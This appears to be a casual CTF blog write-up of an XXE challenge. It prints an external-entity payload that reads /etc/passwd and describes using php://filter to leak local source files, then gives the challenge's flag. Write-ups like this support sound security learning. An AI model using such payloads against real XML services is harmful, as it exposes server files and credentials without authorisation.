XXE basic (CTFS)

Hello guys,XXE this is the kind of vul that i LIKE.Today, i will introduce it via a chall in CTFS… Okayyyyyyyyy! Look at the basic source >.<

 

This is basic language XML to connect sever -…- Here,We need to inject malicious code into the XML.

For example:

Query malicious:

<!DOCTYPE replace [

<!ENTITY doc SYSTEM ‘file:///etc/passwd’>

]>

(/etc/passwd for linux)

execute malicious via insert &doc; in input to sever.

Continue, i with extract source local with filter.

php://filter allows a pen tester to include local files and base64 encodes the output. Therefore, any base64 output will need to be decoded to reveal the contents.

This is a main page “feed.php” , i try guess with flag. Oh god, correct !!!

I receive a flag: U2VjdXJpbmV0c3tYeGVfeFhFX0BMbF9UaDNfV0BZfQo==

with format is base64 and I decode it to get flag : Securinets{Xxe_xXE_@Ll_Th3_W@Y}

BoNuS DoCuMeNtS: https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html

—————THANK YOUUUUU ❤ ——

 

• CTF-WEB
• Uncategorized